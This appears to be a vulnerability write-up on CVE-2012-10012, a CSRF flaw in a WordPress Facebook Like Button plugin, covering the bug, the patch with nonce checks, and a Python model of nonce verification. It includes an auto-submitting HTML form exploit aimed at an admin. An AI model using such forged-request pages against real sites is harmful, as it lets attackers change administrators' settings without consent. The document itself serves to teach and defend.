Introduction
A significant vulnerability, CVE-2012-10012, was discovered in the BestWebSoft Facebook Like Button WordPress plugin, affecting all versions up to 2.13. The flaw is a Cross-Site Request Forgery (CSRF) issue in the fcbk_bttn_plgn_settings_page function, located in facebook-button-plugin.php. In this exclusive long-read, we'll break down what the vulnerability is, how it can be exploited, show you some code, and walk through how it was fixed.
What is Cross-Site Request Forgery (CSRF)?
CSRF is an attack where a malicious website, email, or program makes a user’s browser perform unwanted actions on a trusted site for which the user is currently authenticated. In the case of the BestWebSoft Facebook Like Button plugin, a CSRF flaw means that an attacker could trick an administrator into performing actions on the settings page without their knowledge.
How Does the Vulnerability Work?
The root cause is that the plugin's settings page processes changes without validating a security token (a WordPress nonce). Because nothing in the request proves it originated from the plugin's own settings form, anyone can forge a request that changes plugin settings, provided they can get an authenticated admin to visit a specially crafted URL or website.
Exploit Details
An attacker creates a malicious form that sends a POST request to the plugin’s settings endpoint. If they can convince a logged-in WordPress administrator to submit the form (even without them knowing, say via a hidden iframe or automatic script), the attacker could change plugin settings.
Example Exploit
```html
<!-- Save this as exploit.html and send it to a site admin -->
<html>
<body>
<form action="http://targetsite.com/wp-admin/options-general.php?page=facebook-button-plugin.php" method="POST" id="csrf_form">
<input type="hidden" name="fcbk_some_setting" value="malicious_value" />
<input type="hidden" name="save_settings" value="1" />
</form>
<script>
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
```
When an admin visits this exploit.html page while logged into WordPress, the browser attaches the admin's session cookies to the forged POST, and the plugin settings are modified without the admin's consent. Note that the field names above are placeholders; the real parameter names come from the plugin's settings form.
How was it Fixed?
To prevent CSRF, plugins should use WordPress nonces: wp_nonce_field() embeds a token in the settings form, and check_admin_referer() verifies that token (and the referer) before the request is processed, so a form submitted from a third-party page, which cannot know the token, is rejected.
- Patch commit: 33144ae5a45ed07efe7fceca901d91365fdbf7cb
Before the Patch
```php
// settings processing (vulnerable - missing nonce check)
if (isset($_POST['save_settings'])) {
    update_option('fcbk_bttn_option', $_POST['fcbk_bttn_option']);
}
```
After the Patch
```php
// settings processing (fixed - includes nonce check)
if (isset($_POST['save_settings']) && check_admin_referer('fcbk_bttn_save_settings')) {
    update_option('fcbk_bttn_option', $_POST['fcbk_bttn_option']);
}
```
And in the settings form:
```php
<form method="post">
<?php wp_nonce_field('fcbk_bttn_save_settings'); ?>
<!-- Settings fields -->
</form>
```
This patch ensures only requests carrying a valid nonce for the 'fcbk_bttn_save_settings' action, which only the legitimate admin interface can emit, are accepted; check_admin_referer() stops the request (via wp_die()) when the nonce is missing or invalid.
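To make the mechanism behind the fix concrete, here is an added example (not the plugin's code, and not WordPress's own implementation) that models how a WordPress-style nonce is created and verified, then shows the pre-patch and post-patch settings handlers side by side. The nonce scheme follows the documented WordPress design (a keyed hash over a time tick, the action name, the user id and the session token, valid for the current and previous half-day tick), but the secret key, the function names, the user and session values and the sample POST bodies are all constructed for this example.

```python
import hashlib
import hmac
import math
import time

# Constructed server-side secret for this example. WordPress derives its key
# from NONCE_KEY / NONCE_SALT in wp-config.php; a third-party page never sees it.
NONCE_SECRET = b"constructed-nonce-key-do-not-reuse"
NONCE_LIFE = 24 * 60 * 60          # WordPress default lifetime: one day
SETTINGS_ACTION = "fcbk_bttn_save_settings"   # action name used by the patch


def nonce_tick(now=None):
    """Current half-life window number (models wp_nonce_tick())."""
    now = time.time() if now is None else now
    return math.ceil(now / (NONCE_LIFE / 2))


def _nonce_for_tick(tick, action, user_id, session_token):
    # Keyed hash over tick|action|user|session; keep 10 chars near the end
    # of the hex digest, the same shape WordPress nonces have.
    message = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(NONCE_SECRET, message, hashlib.md5).hexdigest()[-12:-2]


def create_nonce(action, user_id, session_token, now=None):
    """Models wp_create_nonce(): a token bound to this user, session and action."""
    return _nonce_for_tick(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now=None):
    """Models wp_verify_nonce(): 1 for the current tick, 2 for the previous
    tick, False for anything else (missing, forged, wrong user, expired)."""
    if not nonce:
        return False
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = _nonce_for_tick(t, action, user_id, session_token)
        if hmac.compare_digest(expected, nonce):
            return age
    return False


def render_nonce_field(user_id, session_token, now=None):
    """Models wp_nonce_field(): the hidden input the legitimate form carries."""
    token = create_nonce(SETTINGS_ACTION, user_id, session_token, now)
    return f'<input type="hidden" name="_wpnonce" value="{token}" />'


def vulnerable_save_settings(post, options):
    """Pre-patch handler: any POST containing save_settings is applied."""
    if "save_settings" in post:
        options["fcbk_bttn_option"] = post.get("fcbk_bttn_option")
        return True
    return False


def patched_save_settings(post, options, user_id, session_token, now=None):
    """Post-patch handler: the _wpnonce field must verify for the logged-in
    user, their session and the settings action before anything is written.
    (check_admin_referer() would call wp_die() here; we return False instead.)
    A capability check such as current_user_can('manage_options') belongs
    alongside this and is a separate control from the nonce."""
    if "save_settings" not in post:
        return False
    if not verify_nonce(post.get("_wpnonce", ""), SETTINGS_ACTION,
                        user_id, session_token, now):
        return False
    options["fcbk_bttn_option"] = post.get("fcbk_bttn_option")
    return True


def demo(now=1_700_000_000):
    """Run the forged request against both handlers; returns (vuln, patched, options)."""
    admin_id, admin_session = 1, "constructed-session-token"
    # Constructed POST body as a third-party page would submit it: it has the
    # plugin's field names but cannot include a valid _wpnonce.
    forged = {"save_settings": "1", "fcbk_bttn_option": "malicious_value"}
    vuln_opts, patched_opts = {}, {}
    vuln_result = vulnerable_save_settings(forged, vuln_opts)
    patched_result = patched_save_settings(forged, patched_opts, admin_id, admin_session, now)
    return vuln_result, patched_result, patched_opts


if __name__ == "__main__":
    print(demo())
```

The forged POST succeeds against the pre-patch handler and is rejected by the patched one because the attacker's page cannot compute `_wpnonce` without the server secret and the victim's session token. The tick logic also shows why a nonce copied from a legitimate form stops working after the lifetime window, and why a nonce issued to one user is useless for another.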
References
- GitHub Patch Commit
- Vulnerability Database (VDB-225355)
- BestWebSoft Plugin Page
- WordPress Nonces Documentation
Conclusion
CVE-2012-10012 is a classic case of why it's crucial to validate requests in WordPress plugins with nonces to block attackers from tricking admins into making unauthorized changes. If you run the BestWebSoft Facebook Like Button plugin, update now to stay safe!
If you found this post helpful, consider sharing it with your WordPress community to keep others secure as well. 🚨
Timeline
Published on: 04/10/2023 00:15:00 UTC
Last modified on: 04/13/2023 19:49:00 UTC